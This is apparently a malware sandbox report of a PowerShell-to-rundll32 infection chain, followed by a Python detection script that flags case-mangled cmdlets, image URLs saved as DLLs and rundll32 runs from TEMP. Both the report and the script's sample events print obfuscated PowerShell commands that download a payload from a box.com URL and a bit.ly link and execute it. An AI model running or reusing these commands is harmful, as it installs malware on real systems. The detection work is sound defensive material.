Technical information
- https://app.box.com/shared/static/651ujzfffz1yhon0cpnwohj1r4yjo90d.jpg saved as %temp%\eoufyybhct_user_ucasl.dll
- http://bi#.ly/2k4zbtd
- 'bi#.ly':80
- 'ap#.box.com':443
- 'go###e.com.br':80
- 'ap#.box.com':443
- DNS ASK ap#.box.com
- DNS ASK bi#.ly
- DNS ASK go###e.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (NEw-ObJEct systEm.NEt.wEbcLiENt).dOwNLOadfiLE('""https://app.box.com/shared/static/651ujzfffz1yhon0cpnwohj1r4yjo90d.jpg','%TEMP%\eoufyybhct_user_ucasl.dLL');cd $ENv:TEMP ;start-prOcEss ruNdLL3...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (NEw-ObJEct NEt.wEbcLiENt).dOwNLOadstriNg('http://bi#.ly/2k4zbtd')"' (with hidden window)
- '<SYSTEM32>\rundll32.exe' eoufyybhct_user_ucasl.dLL starter
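The three process launches above form one chain: a case-mangled PowerShell one-liner fetches a file served with a .jpg extension, writes it to %TEMP% as a DLL, and starts rundll32.exe on that DLL with the export name `starter`; a second one-liner pulls a script through a URL shortener with DownloadString. The detection logic below is an added example written for this page and is not part of the original report or of any vendor's product. It runs over constructed process-creation events in Sysmon Event ID 1 field names (Image, CommandLine, CurrentDirectory); the URL and DLL name are the ones the report lists, the shortener domain is kept masked as the report masks it, the CurrentDirectory value is an assumed user TEMP path, and the rule names are this example's own. The casing check relies on a fact of PowerShell rather than a string signature: cmdlet and .NET member names are case-insensitive, so legitimate scripts use the canonical spelling (or all-lowercase) and any other casing of a known name is a sign of obfuscation.

```python
import re

# Constructed sample events (Sysmon Event ID 1 field names), modelled on the
# command lines in the report above. They are not real telemetry: the URL and
# DLL name are those from the report, the bit.ly domain stays masked as the
# report masks it, and CurrentDirectory is an assumed user TEMP path.
SAMPLE_EVENTS = [
    {   # first PowerShell stage: fetch the ".jpg" and save it as a DLL
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'''powershell.exe (NEw-ObJEct systEm.NEt.wEbcLiENt).dOwNLOadfiLE('""https://app.box.com/shared/static/651ujzfffz1yhon0cpnwohj1r4yjo90d.jpg','%TEMP%\eoufyybhct_user_ucasl.dLL');cd $ENv:TEMP ;start-prOcEss ruNdLL32''',
    },
    {   # second PowerShell stage: fetch and run a script from a URL shortener
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe (NEw-ObJEct NEt.wEbcLiENt).dOwNLOadstriNg('http://bi#.ly/2k4zbtd')",
    },
    {   # payload launch: rundll32 with a relative DLL name and export "starter"
        "Image": r"C:\Windows\System32\rundll32.exe",
        "CurrentDirectory": r"C:\Users\user\AppData\Local\Temp",
        "CommandLine": "rundll32.exe eoufyybhct_user_ucasl.dLL starter",
    },
    {   # benign control: canonically cased cmdlet, no download, no rundll32
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe Get-ChildItem C:\Windows\Temp",
    },
]

# PowerShell names are case-insensitive; attackers randomise letter case to
# defeat naive string matching. Anything other than the canonical spelling or
# a uniform lower/upper spelling of these names is treated as mangled.
CANONICAL_NAMES = {
    "new-object": "New-Object",
    "start-process": "Start-Process",
    "get-childitem": "Get-ChildItem",
    "webclient": "WebClient",
    "downloadfile": "DownloadFile",
    "downloadstring": "DownloadString",
    "rundll32": "rundll32",
}
DOWNLOAD_METHODS = ("downloadfile", "downloadstring", "downloaddata")
IMAGE_EXTENSIONS = (".jpg", ".jpeg", ".png", ".gif", ".bmp")


def mangled_tokens(cmd: str) -> list[str]:
    """Known PowerShell names whose casing is neither canonical nor uniform,
    e.g. 'dOwNLOadfiLE' for DownloadFile."""
    found = []
    for tok in re.findall(r"[A-Za-z][A-Za-z0-9-]*", cmd):
        canon = CANONICAL_NAMES.get(tok.lower())
        if canon and tok not in (canon, tok.lower(), tok.upper()):
            found.append(tok)
    return found


def download_args(cmd: str):
    """(url, destination) of a DownloadFile(url, dest) call, ignoring case and
    stray double quotes such as the '""https://' captured in the report."""
    flat = cmd.replace('"', "").lower()
    m = re.search(r"downloadfile\(\s*'([^']*)'\s*,\s*'([^']*)'", flat)
    return (m.group(1), m.group(2)) if m else None


def parse_rundll32(cmd: str):
    """Split 'rundll32.exe <dll>[,<export>] [<export>]' into (dll, export)."""
    parts = cmd.split()
    if len(parts) < 2:
        return None
    if "," in parts[1]:
        dll, export = parts[1].split(",", 1)
    else:
        dll, export = parts[1], (parts[2] if len(parts) > 2 else "")
    return dll, export


def analyze_event(event: dict) -> list[str]:
    """Apply the rules to one event; return the names of the rules that fire."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "")
    low = cmd.lower()
    hits = []
    if image == "powershell.exe":
        if "webclient" in low and any(m in low for m in DOWNLOAD_METHODS):
            hits.append("powershell_webclient_download")
        if len(mangled_tokens(cmd)) >= 2:
            hits.append("case_mangled_cmdlets")
        args = download_args(cmd)
        if args and args[0].endswith(IMAGE_EXTENSIONS) and args[1].endswith(".dll"):
            hits.append("image_url_saved_as_dll")
    elif image == "rundll32.exe":
        parsed = parse_rundll32(cmd)
        if parsed:
            dll, _export = parsed
            dll_low = dll.lower()
            cwd = event.get("CurrentDirectory", "").lower()
            absolute = re.match(r"^[a-z]:\\", dll_low) is not None
            # A relative DLL name resolves against the working directory, which
            # is how "cd $ENv:TEMP; start-process rundll32 ..." hides the path.
            if "%temp%" in dll_low or "\\temp\\" in dll_low or (not absolute and "\\temp" in cwd):
                hits.append("rundll32_dll_from_temp")
    return hits


def scan(events: list[dict]) -> dict[int, list[str]]:
    """Event index -> firing rules, for every event that fired at least one."""
    return {i: h for i, e in enumerate(events) if (h := analyze_event(e))}


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["Image"].rsplit("\\", 1)[-1], rules)
```

The rundll32 rule keys on the working directory because the one-liner changes into $ENv:TEMP before launching rundll32 with a bare file name, so the command line alone never shows a TEMP path; any detection that only pattern-matches CommandLine misses this step.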